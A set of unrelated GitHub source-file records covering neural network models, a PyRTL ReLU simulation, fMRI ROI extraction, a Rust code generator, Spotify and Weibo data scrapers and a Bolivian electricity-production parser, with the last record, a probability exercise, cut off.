+{"seq_id":"3512433194","text":"import torch.nn as nn\nimport math\nimport torch\n\nclass BiLSTM(nn.Module):\n def __init__(self, input_size, hidden_size=128, dropout_rate=0.1, layer_num=1):\n super(BiLSTM, self).__init__()\n self.hidden_size = hidden_size\n if layer_num == 1:\n self.bilstm = nn.LSTM(input_size, hidden_size // 2, layer_num, batch_first=True, bidirectional=True)\n\n else:\n self.bilstm = nn.LSTM(input_size, hidden_size // 2, layer_num, batch_first=True, dropout=dropout_rate,\n bidirectional=True)\n self.init_weights()\n\n def init_weights(self):\n for p in self.bilstm.parameters():\n if p.dim() > 1:\n nn.init.normal_(p)\n p.data.mul_(0.01)\n else:\n p.data.zero_()\n # This is the range of indices for our forget gates for each LSTM cell\n p.data[self.hidden_size // 2: self.hidden_size] = 1\n\n def forward(self, x, lens):\n '''\n :param x: (batch, seq_len, input_size)\n :param lens: (batch, )\n :return: (batch, seq_len, hidden_size)\n '''\n ordered_lens, index = lens.sort(descending=True)\n ordered_x = x[index]\n\n packed_x = nn.utils.rnn.pack_padded_sequence(ordered_x, ordered_lens.cpu(), batch_first=True)\n packed_output, (ht, ct) = self.bilstm(packed_x)\n output, _ = nn.utils.rnn.pad_packed_sequence(packed_output, batch_first=True)\n\n recover_index = index.argsort()\n recover_output = output[recover_index]\n\n sent_emb = ht[-2:].permute(1, 0, 2).reshape(len(lens), -1)\n sent_emb = sent_emb[recover_index] # (num_layers * 2, batch, hidden_size//2)\n return recover_output, sent_emb\n\n\nclass RNN(nn.Module):\n def __init__(self, vocab_size, num_classes, embed_size, hidden_size, dropout_rate, num_layers,\n pretrained_embed=None, freeze=False):\n super(RNN, self).__init__()\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n\n if pretrained_embed is not None:\n self.embed = nn.Embedding.from_pretrained(pretrained_embed, freeze)\n else:\n self.embed = nn.Embedding(vocab_size, embed_size)\n\n self.rnn = BiLSTM(embed_size, hidden_size, dropout_rate, num_layers)\n self.fc = nn.Linear(hidden_size, num_classes)\n # self.dropout = nn.Dropout(dropout_rate)\n\n self.init_weights()\n\n def init_weights(self):\n std = 1.0 / math.sqrt(self.hidden_size)\n for w in self.parameters():\n w.data.uniform_(-std, std)\n\n def forward(self, x, lens):\n embeddings = self.embed(x)\n output, sent_emb = self.rnn(embeddings, lens)\n # out = self.fc(self.dropout(sent_emb))\n out = self.fc(sent_emb)\n return out\n\nclass HiddenLayer(nn.Module):\n def __init__(self, input_size, output_size):\n super(HiddenLayer, self).__init__()\n self.fc = nn.Linear(input_size, output_size)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n return self.relu(self.fc(x))\n\n\nclass MLP(nn.Module):\n def __init__(self, hidden_size=100, num_layers=1, activation_layer=\"sigmoid\", input_dim = 1):\n super(MLP, self).__init__()\n self.activation_layer = activation_layer\n self.first_hidden_layer = HiddenLayer(input_dim, hidden_size)\n self.rest_hidden_layers = nn.Sequential(*[HiddenLayer(hidden_size, hidden_size) for _ in range(num_layers - 1)])\n self.output_layer = nn.Linear(hidden_size, 1)\n\n def forward(self, x):\n x = self.first_hidden_layer(x)\n x = self.rest_hidden_layers(x)\n x = self.output_layer(x)\n return torch.sigmoid(x)\n","repo_name":"SumilerGAO/SunGen","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"34"} +{"seq_id":"187504555","text":"import pyrtl\nimport random\n\n# def relu(vec):\n# \tfor i in vec:\n# \t\twith pyrtl.conditional_assignment:\n# \t\t\twith i[0] == 1:\n# \t\t\t\ti.next |= 0\n# \t\t\twith pyrtl.otherwise:\n# \t\t\t\tpass\n# \treturn vec\ndef relu(vec):\n # assert offset <= 24\n # d[-1] of 2's complement is the signed bit\n # if 0 -> falsecase (positive)\n # if 1 -> truecase (negative)\n return [pyrtl.select(d[-1], falsecase=d, truecase=pyrtl.Const(0, len(d))) for d in vec]\n# Now all we need to do is call \"sim.step\" to simulate each clock cycle of our\n# design. We just need to pass in some input each cycle which is a dictionary\n# mapping inputs (the *names* of the inputs, not the actual Input instances)\n# and a value for that signal each cycle. In this simple example we\n# can just specify a random value of 0 or 1 with python's random module. We\n# call step 15 times to simulate 15 cycles.\n\n# for cycle in range(15):\n# sim.step({\n# 'a': random.choice([0, 1]),\n# 'b': random.choice([0, 1]),\n# 'c': random.choice([0, 1])\n# })\n\nreg_vec = [pyrtl.Register(32) for i in range(0, 8)]\ninputs = [pyrtl.Input(32, 'input_{}'.format(i)) for i in range(0, 8)]\ntest_dict = {\n\t\t'input_0': 3,\n\t\t'input_1': -39 & 0xFFFFFFFF,\n\t\t'input_2': 17,\n\t\t'input_3': 7,\n\t\t'input_4': -42 & 0xFFFFFFFF,\n\t\t'input_5': -18 & 0xFFFFFFFF,\n\t\t'input_6': 37,\n\t\t'input_7': -6 & 0xFFFFFFFF\n\t\t}\noutput_orig = [pyrtl.Output(32, 'out_orig_{}'.format(i)) for i in range(0, 8)]\noutput_relu = [pyrtl.Output(32, 'out_relu_{}'.format(i)) for i in range(0, 8)]\n\nfor index,reg in enumerate(reg_vec):\n\t# inputs[index] <<= test_dict[index]\n\treg.next <<= inputs[index]\n\toutput_orig[index] <<= reg\nrelu_func_out = relu(reg_vec)\nfor i, index in enumerate(output_relu):\n\tindex <<= relu_func_out[i]\n\nsim_trace = pyrtl.SimulationTrace()\nsim = pyrtl.Simulation(tracer=sim_trace)\n\nfor cycle in range(35):\n\tsim.step(test_dict)\n\n\n# Now all we need to do is print the trace results to the screen. Here we use\n# \"render_trace\" with some size information.\nprint('--- ReLU Simulation ---')\nsim_trace.render_trace(symbol_len=5, segment_size=5)\n\n# a_value = sim.inspect(a)\n# print(\"The latest value of a was: \" + str(a_value))\n\n# --- Verification of Simulated Design ---------------------------------------\n\n# Now finally, let's check the trace to make sure that sum and carry_out are actually\n# the right values when compared to a python's addition operation. Note that\n# all the simulation is done at this point and we are just checking the wave form\n# but there is no reason you could not do this at simulation time if you had a\n# really long running design.\n\n# for cycle in range(15):\n# \t# Note that we are doing all arithmetic on values NOT wirevectors here.\n# \t# We can add the inputs together to get a value for the result\n# \tadd_result = (sim_trace.trace['a'][cycle] +\n# \t\t\t\t sim_trace.trace['b'][cycle] +\n# \t\t\t\t sim_trace.trace['c'][cycle])\n# \t# We can select off the bits and compare\n# \tpython_sum = add_result & 0x1\n# \tpython_cout = (add_result >> 1) & 0x1\n\n# You made it to the end!\nexit(0)\n","repo_name":"saurabhhgupta/OpenTPU","sub_path":"testing/relu_test.py","file_name":"relu_test.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"37984420168","text":"import pandas as pd\nimport numpy as np\nfrom nilearn import image\nfrom nilearn.masking import apply_mask\n\n\n# Set input and output paths\ndata_dir = './Pilot_N3'\nROIs_dir = f'{data_dir}/ROIs'\nfmri_prep = f'{data_dir}/derivatives/fmri_prep'\nfstlvl_dir = f'{data_dir}/derivatives/fmri_prep/firstlvl_out/contrast_files'\ndf_out = f'{data_dir}/data'\n\n# Load in binarized ROIs (these are created using the provided .txt file)\n# L/R NAcc is 50thr Harvard-Oxford Subcortical mask\n# L/R Ant Insula is the 50thr Harvard-Oxford Cortical mask that is masked by anterior masked downloaded from neurosynth (thresh 8)\n# Thus, remaining part of the Harvard-Oxford Insula is only the anterior portion overlapping with neurosynth mask\nr_nacc = image.load_img(f'{ROIs_dir}/Left_NAcc.nii.gz')\nL_nacc = image.load_img(f'{ROIs_dir}/Right_NAcc.nii.gz')\nr_ains = image.load_img(f'{ROIs_dir}/Right_AnteriorInsula.nii.gz')\nl_ains = image.load_img(f'{ROIs_dir}/Left_AnteriorInsula.nii.gz')\n\n# List of Subjects and Runs\nsubj = [\"31\",\"21\"]\nruns = [\"01\", \"02\"]\n\n# Contrasts (beta maps) to work through;\n# Differentiated by uppercase, LS = Large+Small; L = Large;\n# loss = 'Don't Lose', gain = 'Win', Neut = 'No Money at Stake'\ncontrasts = [\"Lgain-Neut\", \"LSgain-Neut\", \"Lgain-Lloss\",\n \"Lloss-Neut\", \"LSloss-Neut\", \"Lloss-Lgain\"]\n\n# setting up ROI label and variable name for nifti file\nrois = {\"L-Ins\": l_ains,\n \"R-Ins\": r_ains,\n \"L-NAcc\": l_nacc,\n \"R-NAcc\": r_nacc}\n\n\n# Creating empty lists where the mean beta values and item names are saved\nbeta_vals = []\nbeta_items = []\n\n# looping and extract mean beta estimate by masking img (beta map) by mask (roi).\n# the '*beta.nii.gz' image is the 'effect_size' output file from nilearn's firstlevel compute_contrast()\nfor s in subj:\n for r in runs:\n for c in contrasts:\n for roi,img in rois.items():\n beta_map = image.load_img(f'{fstlvl_dir}/sub-{s}_ses-01_task-mid_run-{r}_contrast_{c}_beta.nii.gz')\n beta_mean = np.mean(apply_mask(imgs=beta_map, mask_img=img))\n beta_vals.append(beta_mean)\n beta_items.append(f'sub-{s}_{r}_{c}_{roi}')\n\n# After loop which creates a row for each subject, run, contrast, roi combination, reshape the data into something that is wide\n# wide formate conversation: subjects remain as rows. Columns are run_contrast_roi with associated row values representing beta estimate for contrasts\ndf = pd.DataFrame({'Items': beta_items,\n 'Values': beta_vals})\ndf[['subj','run', 'contrast','roi']] = df.Items.str.split(\"_\",expand=True)\ndf = df.drop(columns=['Items'])\ndf = df.pivot_table(index=\"subj\",\n columns=[\"run\",\"contrast\",\"roi\"],\n values =\"Values\")\n\n# Since the variables are in stacked format, loop through x,y,z (3 stacked variables), to combined and produce {run_contrast_roi} column name\ndf.columns = [f'{x}_{y}_{z}' for x,y,z in df.columns]\n# export signal intensity df into .csv\ndf.to_csv(f'{df_out}/ROImeansignal.csv')\n\n# After calculating ROI estimates, calculating % signal for each ROI (to exclude for excess dropout)\nroi_vals = []\nroi_items = []\nfor s in subj:\n for r in runs:\n for roiname,roi_img in rois.items():\n brain = image.load_img(f'{fmri_prep}/sub-{s}/ses-1/func/sub-{s}_ses-1_task-mid_run-{r}_*brain_mask.nii.gz')\n brain_roimask = apply_mask(imgs=brain, mask_img=roi_img)\n roi = roi_img.get_fdata()\n brain_vox = brain_roimask.sum()\n roi_vox = roi.sum()\n BrRo_perc = brain_vox/roi_vox\n roi_vals.append(BrRo_perc)\n roi_items.append(f'sub-{s}_{r}_{roiname}')\n\n# Do the same as for mean signal intensity df, but for the voxel overlap\nROIvox_df = pd.DataFrame({'Items': roi_items,\n 'Values': roi_vals})\nROIvox_df[['subj','run', 'roiname']] = ROIvox_df.Items.str.split(\"_\",expand=True)\nROIvox_df = ROIvox_df.drop(columns=['Items'])\nROIvox_df = ROIvox_df.pivot_table(index=\"subj\",\n columns=[\"run\",\"roiname\"],\n values =\"Values\")\n\nROIvox_df.columns = [f'{x}_{y}' for x,y in ROIvox_df.columns]\n# export voxel overlap df into .csv\nROIvox_df.to_csv(f'{df_out}/ROIvMaskVoxels.csv')\n","repo_name":"demidenm/Multisample_MIDMeasureStruct","sub_path":"Stage1_Code/BetaMap_ROI.py","file_name":"BetaMap_ROI.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31588646541","text":"from compile import VariableType, VariableRefType\n\ndef to_initial_caps(snake_str):\n components = snake_str.split(\"_\")\n return \"\".join(x.title() for x in components)\n\ndef display(contract):\n indent = \" \" * 4\n\n print(r\"\"\"use super::vm::{ZKVirtualMachine, CryptoOperation, AllocType, ConstraintInstruction, VariableIndex, VariableRef};\nuse bls12_381::Scalar;\n\npub fn load_params(params: Vec) -> Vec<(VariableIndex, Scalar)> {\"\"\")\n params = [(symbol, var) for symbol, var in contract.alloc.items() if var.is_param]\n print(\"%sassert_eq!(params.len(), %s);\" % (indent, len(params)))\n print(\"%slet mut result = vec![(0, Scalar::zero()); %s];\" % (\n indent, len(params)))\n for i, (symbol, variable) in enumerate(params):\n assert variable.is_param\n print(\"%s// %s\" % (indent, symbol))\n print(\"%sresult[%s] = (%s, params[%s]);\" % (\n indent, i, variable.index, i))\n print(\"%sresult\" % indent)\n print(\"}\\n\")\n\n print(r\"\"\"pub fn load_zkvm() -> ZKVirtualMachine {\n ZKVirtualMachine {\n constants: vec![\"\"\")\n\n constants = list(contract.constants.items())\n constants.sort(key=lambda obj: obj[1][0])\n constants = [(obj[0], obj[1][1]) for obj in constants]\n for symbol, value in constants:\n print(\"%s// %s\" % (indent * 3, symbol))\n assert len(value) == 32*2\n chunk_str = lambda line, n: \\\n [line[i:i + n] for i in range(0, len(line), n)]\n chunks = chunk_str(value, 2)\n # Reverse the endianness\n # We allow literal numbers but rust wants little endian\n chunks = chunks[::-1]\n print(\"%sScalar::from_bytes(&[\" % (indent * 3))\n for i in range(0, 32, 4):\n print(\"%s0x%s, 0x%s, 0x%s, 0x%s,\" % (indent * 4,\n chunks[i], chunks[i + 1], chunks[i + 2], chunks[i + 3]))\n print(\"%s]).unwrap(),\" % (indent * 3))\n\n print(\"%s],\" % (indent * 2))\n print(\"%salloc: vec![\" % (indent * 2))\n\n for symbol, variable in contract.alloc.items():\n print(\"%s// %s\" % (indent * 3, symbol))\n\n if variable.type.name == VariableType.PRIVATE.name:\n typestring = \"Private\"\n elif variable.type.name == VariableType.PUBLIC.name:\n typestring = \"Public\"\n else:\n assert False\n\n print(\"%s(AllocType::%s, %s),\" % (indent * 3, typestring,\n variable.index))\n\n print(\"%s],\" % (indent * 2))\n print(\"%sops: vec![\" % (indent * 2))\n\n def var_ref_str(var_ref):\n if var_ref.type.name == VariableRefType.AUX.name:\n return \"VariableRef::Aux(%s)\" % var_ref.index\n elif var_ref.type.name == VariableRefType.LOCAL.name:\n return \"VariableRef::Local(%s)\" % var_ref.index\n else:\n assert False\n\n for op in contract.ops:\n print(\"%s// %s\" % (indent * 3, op.line))\n args_part = \"\"\n if op.command == \"load\":\n assert len(op.args) == 2\n args_part = \"(%s, %s)\" % (var_ref_str(op.args[0]), op.args[1].index)\n elif op.command == \"debug\":\n assert len(op.args) == 1\n args_part = '(String::from(\"%s\"), %s)' % (\n op.line, var_ref_str(op.args[0]))\n elif op.args:\n args_part = \", \".join(var_ref_str(var_ref) for var_ref in op.args)\n args_part = \"(%s)\" % args_part\n print(\"%sCryptoOperation::%s%s,\" % (\n indent * 3,\n to_initial_caps(op.command),\n args_part\n ))\n\n print(\"%s],\" % (indent * 2))\n print(\"%sconstraints: vec![\" % (indent * 2))\n\n for constraint in contract.constraints:\n args_part = \"\"\n if constraint.args:\n print(\"%s// %s\" % (indent *3, constraint.args_comment()))\n args = constraint.args[:]\n if (constraint.command == \"lc0_add_coeff\" or\n constraint.command == \"lc1_add_coeff\" or\n constraint.command == \"lc2_add_coeff\" or\n constraint.command == \"lc0_add_one_coeff\" or\n constraint.command == \"lc1_add_one_coeff\" or\n constraint.command == \"lc2_add_one_coeff\"):\n args[0] = args[0][0]\n args_part = \", \".join(str(index) for index in args)\n args_part = \"(%s)\" % args_part\n print(\"%sConstraintInstruction::%s%s,\" % (\n indent * 3,\n to_initial_caps(constraint.command),\n args_part\n ))\n print(r\"\"\" ],\n aux: vec![],\n params: None,\n verifying_key: None,\n }\n}\"\"\")\n\n","repo_name":"narodnik/sapvi","sub_path":"scripts/compile_export_rust.py","file_name":"compile_export_rust.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"30736381951","text":"\"\"\"\r\nScript créant un jeu de données des pistes contenues dans différentes playlists.\r\nPour chaque chanson, ses caractéristiques audio sont ajoutées.\r\n\"\"\"\r\n\r\nimport spotipy\r\nimport spotipy.util as util\r\nimport pandas as pd\r\n\r\nfrom spotipy.oauth2 import SpotifyClientCredentials\r\n\r\n# Dictionnaire de playlist\r\nplaylists = [\r\n # Classique\r\n ## Classical Essentials - 101 titres\r\n {\"Genre\": \"Classique\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWWEJlAGA9gs0\"},\r\n ## Piano 100: Spotify Picks - 100 titres\r\n {\"Genre\": \"Classique\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXah8e1pvF5oE\"},\r\n # Jazz\r\n ## Jazz Collection - 50 titres\r\n {\"Genre\": \"Jazz\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWZx4L0CjnaL9\"},\r\n ## Late Night Jazz - 58 titres\r\n {\"Genre\": \"Jazz\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX4wta20PHgwo\"},\r\n ## Jazz Classics - 70 titres\r\n {\"Genre\": \"Jazz\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXbITWG1ZJKYt\"},\r\n # Blues\r\n ## Acoustic Blues - 64 titres\r\n {\"Genre\": \"Blues\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX2iUghHXGIjj\"},\r\n # Electro\r\n ## New Electro - 50 titres\r\n {\"Genre\": \"Electro\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWTIfBdh7WtFL\"},\r\n ## Dance Hits - 157 titres\r\n {\"Genre\": \"Electro\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX0BcQWzuB7ZO\"},\r\n # Rock\r\n ## Légendes du Rock - 50 titres\r\n {\"Genre\": \"Rock\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWXTHBOfJ8aI7\"},\r\n ## Indie Rock Club - 50 titres\r\n {\"Genre\": \"Rock\", \"URL\":\" https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX35DWKgAk2B5\"},\r\n ## Rock Classics - 130 titres\r\n {\"Genre\": \"Rock\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWXRqgorJj26U\"},\r\n # Indie\r\n ## Indie Station - 50 titres\r\n {\"Genre\": \"Indie\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX924zU1IARaD\"},\r\n ## Hot Alternative - 50 titres\r\n {\"Genre\": \"Indie\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWTRqg6ucMOrz\"},\r\n # Pop\r\n ## Pop collection - 50 titres\r\n {\"Genre\": \"Pop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWYX0SFpLcPgx\"},\r\n ## Today's Top Hits - 50 titres\r\n {\"Genre\": \"Pop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXcBWIGoYBM5M\"},\r\n ## Melting Pop - 50 titres\r\n {\"Genre\": \"Pop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWYfb7VzTqlBj\"},\r\n ## Hit Rewind - 55 titres\r\n {\"Genre\": \"Pop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX0s5kDXi1oC5\"},\r\n # Metal\r\n ## Metal Essentials - 69 titres\r\n {\"Genre\": \"Metal\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWWOaP4H0w5b0\"},\r\n ## Masters of Metal - 50 titres\r\n {\"Genre\": \"Metal\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX6BrB0kUwSdM\"},\r\n # Hip-Hop\r\n ## Rap Collection - 35 titres\r\n {\"Genre\": \"Hip-Hop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWSCuekGD3tIW\"},\r\n ## Classiques du Rap US - 70 titres\r\n {\"Genre\": \"Hip-Hop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXawlg2SZawZf\"},\r\n ## Classiques du Rap Français - 58 titres\r\n {\"Genre\": \"Hip-Hop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWSrqNVMcxGKc\"},\r\n # Folk\r\n ## Classic Acoustic - 86 titres\r\n {\"Genre\": \"Folk\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX504r1DvyvxG\"},\r\n ## Essential Folk - 94 titres\r\n {\"Genre\": \"Folk\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWVmps5U8gHNv\"},\r\n # RnB\r\n ## Alternative R&B - 54 titres\r\n {\"Genre\": \"RnB\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWSfMe9z89s9B\"},\r\n ## R&B now - 40 titres\r\n {\"Genre\": \"RnB\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWYfb7VzTqlBj\"}\r\n]\r\n\r\nmyid = 'id'\r\nmysecret = 'secretid'\r\nclient_credentials_manager = SpotifyClientCredentials(client_id=myid, client_secret=mysecret)\r\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\r\n\r\n\r\ndef get_playlist_tracks(username,playlist_id):\r\n results = sp.user_playlist_tracks(username, playlist_id)\r\n tracks = results['items']\r\n while results['next']:\r\n results = sp.next(results)\r\n tracks.extend(results['items'])\r\n return tracks\r\n\r\n\r\ndef get_playlists():\r\n df = pd.DataFrame()\r\n list_songs = []\r\n for playlist in playlists:\r\n print(\"############### \" + str(playlist['Genre']) + \" ###############\")\r\n list_songs = get_playlist_tracks(\"spotify\", str(playlist['URL']))\r\n for song in list_songs:\r\n artist = (str(song['track']['artists'][0]['name']))\r\n title = (str(song['track']['name']))\r\n popularity = (str(song['track']['popularity']))\r\n uri = (str(song['track']['uri']))\r\n print(str(artist) + \" - \" + str(title))\r\n\r\n # Requête des caractéristiques musicales\r\n audio_features = sp.audio_features(uri)[0]\r\n\r\n df = df.append({\"artiste\": artist, \"titre\": title, \"popularite\": popularity, \"uri\": uri, \"genre\": str(playlist['Genre']), **audio_features}, ignore_index=True)\r\n return df\r\n\r\n\r\ndef main():\r\n # Noms ordonnés des colonnes\r\n columns = ['artiste', 'titre', 'popularite', 'genre', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo', 'duration_ms', 'time_signature']\r\n df = get_playlists()\r\n df = df[columns]\r\n df.to_excel('export_full.xlsx')\r\n print(df.groupby('genre').count())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dbeley/spotify-scripts","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2245811724","text":"from selenium.webdriver import Chrome\nfrom bs4 import BeautifulSoup\nimport time\nimport sys\n\n\n\nclass Spider:\n def __init__(self,index_url,target_url,page_range):\n self.index_url = index_url\n self.target_url = target_url\n self.page_range = page_range + 1\n self.raw_html = []\n self.boot()\n def boot(self):\n self.driver = Chrome()\n self.driver.start_client()\n self.check_cookie()\n def check_cookie(self):\n from xcookie import cookie_list\n if cookie_list:\n self.driver.get(self.index_url)\n time.sleep(8)\n self.driver.delete_all_cookies()\n print('clear')\n for c in cookie_list:\n self.driver.add_cookie(c)\n print('Done')\n else:\n print('please insert cookie!')\n sys.exit()\n\n def crawl(self):\n for p in range(1,self.page_range):\n full_url = f'{self.target_url}{p}'\n self.driver.get(full_url)\n print(full_url)\n time.sleep(5)\n self.raw_html.append(self.driver.page_source)\n\n\nclass Parser:\n def __init__(self,raw_html):\n self.raw_html = raw_html\n self.info = []\n def parse(self):\n for html in self.raw_html:\n soup = BeautifulSoup(html, 'html.parser')\n text_sel = 'div.WB_detail'\n text = soup.select(text_sel)\n for text_detail in text:\n content = text_detail.get_text()\n clean_text = content.replace(' ','').replace('\\n','')\n self.info.append(clean_text)\n print(self.info)\n\n def save_to_csv(self):\n with open('collection.txt','a+') as f:\n for i in self.info:\n f.write(i)\n f.write('\\n')\n f.write('-'*50)\n f.write('\\n')\n\ns = Spider(index_url='https://www.weibo.com/',target_url='https://www.weibo.com/fav?page=',page_range=2)\ns.crawl()\np = Parser(s.raw_html)\np.parse()\np.save_to_csv()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"keizerkjj/Spider-exercises","sub_path":"s41_oop微博.py","file_name":"s41_oop微博.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43390970429","text":"#!/usr/bin/env python3\n\n# The arrow library is used to handle datetimes\nimport arrow\nimport json\n# The request library is used to fetch content through HTTP\nimport requests\nimport re\n\ntz_bo = 'America/La_Paz'\n\n\ndef extract_xsrf_token(html):\n \"\"\"Extracts XSRF token from the source code of the generation graph page.\"\"\"\n return re.search(r'var ttoken = \"([a-f0-9]+)\";', html).group(1)\n\n\ndef template_response(zone_key, datetime, source):\n return {\n \"zoneKey\": zone_key,\n \"datetime\": datetime,\n \"production\": {\n \"hydro\": 0.0,\n \"unknown\": 0, # Gas + Oil are mixed, so unknown for now\n \"wind\": 0\n },\n \"storage\": {},\n \"source\": source,\n }\n\ndef template_forecast_response(zone_key, datetime, source):\n return {\n \"zoneKey\": zone_key,\n \"datetime\": datetime,\n \"value\": None,\n \"source\": source,\n }\n\n\ndef fetch_production(zone_key='BO', session=None, target_datetime=None, logger=None) -> dict:\n \"\"\"Requests the last known production mix (in MW) of a given country.\"\"\"\n if target_datetime is not None:\n now = arrow.get(target_datetime)\n else:\n now = arrow.now(tz=tz_bo)\n\n r = session or requests.session()\n\n # Define actual and previous day (for midnight data).\n formatted_date = now.format('YYYY-MM-DD')\n\n # initial path for url to request\n url_init = 'https://www.cndc.bo/gene/dat/gene.php?fechag={0}'\n\n # XSRF token for the initial request\n xsrf_token = extract_xsrf_token(r.get(\"https://www.cndc.bo/gene/index.php\").text)\n\n resp = r.get(url_init.format(formatted_date), headers={\n \"x-csrf-token\": xsrf_token\n })\n\n hour_rows = json.loads(resp.text.replace('', ''))[\"data\"]\n payload = []\n\n for hour_row in hour_rows:\n [hour, forecast, _total, thermo, hydro, wind, _unknown] = hour_row\n\n if target_datetime is None and hour > now.hour:\n continue\n\n if hour == 24:\n timestamp = now.shift(days=1)\n else:\n timestamp = now\n\n if target_datetime is not None and hour < 24:\n timestamp = timestamp.replace(hour=hour-1)\n\n\n hour_resp = template_response(zone_key, timestamp.datetime, \"cndc.bo\")\n hour_resp[\"production\"][\"unknown\"] = thermo\n hour_resp[\"production\"][\"hydro\"] = hydro\n hour_resp[\"production\"][\"wind\"] = wind\n\n payload.append(hour_resp)\n\n return payload\n\n\ndef fetch_generation_forecast(zone_key='BO', session=None, target_datetime=None, logger=None):\n if target_datetime:\n raise NotImplementedError('This parser is not yet able to parse past dates')\n\n now = arrow.now(tz=tz_bo)\n\n r = session or requests.session()\n\n # Define actual and previous day (for midnight data).\n formatted_date = now.format('YYYY-MM-DD')\n\n # initial path for url to request\n url_init = 'https://www.cndc.bo/gene/dat/gene.php?fechag={0}'\n\n # XSRF token for the initial request\n xsrf_token = extract_xsrf_token(r.get(\"https://www.cndc.bo/gene/index.php\").text)\n\n resp = r.get(url_init.format(formatted_date), headers={\n \"x-csrf-token\": xsrf_token\n })\n\n hour_rows = json.loads(resp.text.replace('', ''))[\"data\"]\n payload = []\n\n for hour_row in hour_rows:\n [hour, forecast, _total, _thermo, _hydro, _wind, _unknown] = hour_row\n\n if hour == 24:\n timestamp = now.shift(days=1)\n else:\n timestamp = now\n\n zeroed = timestamp.replace(hour=hour-1, minute=0, second=0, microsecond=0)\n\n hour_resp = template_forecast_response(zone_key, zeroed.datetime, \"cndc.bo\")\n hour_resp[\"value\"] = forecast\n\n payload.append(hour_resp)\n\n return payload\n\nif __name__ == '__main__':\n \"\"\"Main method, never used by the Electricity Map backend, but handy for testing.\"\"\"\n print('fetch_production() ->')\n print(fetch_production())\n\n print('fetch_generation_forecast() ->')\n print(fetch_generation_forecast())\n","repo_name":"jorgermurillo/electricitymap","sub_path":"parsers/BO.py","file_name":"BO.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"24719675048","text":"import FlatPlugin\nimport os\nimport uuid\nimport csv\nfrom datetime import datetime , timedelta\nimport Helper\nimport DBPlugin\n\ndb=DBPlugin.get_connection()\n\ndef find_flat(cursor,building,flat_number):\n #print(\"Looking for flat {} {}\".format(building,str(flat_number)))\n find_sql = 'SELECT * FROM FLAT WHERE BUILDING=%s AND FLAT_NUMBER=%s'\n cursor.execute(find_sql, (building, flat_number))\n existing = cursor.fetchone();\n return existing\n\ndef add_flats():\n flats=Helper.get_flat_details()\n cursor = db.cursor(dictionary=True)\n for flat in flats:\n existing=find_flat(cursor,flat.get('BUILDING'),flat.get('FLAT_NUMBER'))\n if existing is None :\n Helper.insert_dict(cursor,'FLAT',flat)\n else:\n id=existing.get(\"ID\")\n Helper.update_dict_by_id(cursor,'FLAT',flat,id)\n db.commit()","repo_name":"GrandViewTech/PyWebApp","sub_path":"src/BuildingService.py","file_name":"BuildingService.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25284394861","text":"from math import factorial\nfrom math import exp\n\ndef combination (n , k):\n return int(factorial(n) / (factorial(k) * factorial(n - k)))\n\n# 1.Вероятность того, что стрелок попадет в мишень, выстрелив один раз, равна 0.8. Стрелок выстрелил 100 раз.\n# Найдите вероятность того, что стрелок попадет в цель ровно 85 раз\n\nn = 100 # число испытания\nk = 85 # число наступлений события\np = 0.8 # вероятноять наступления 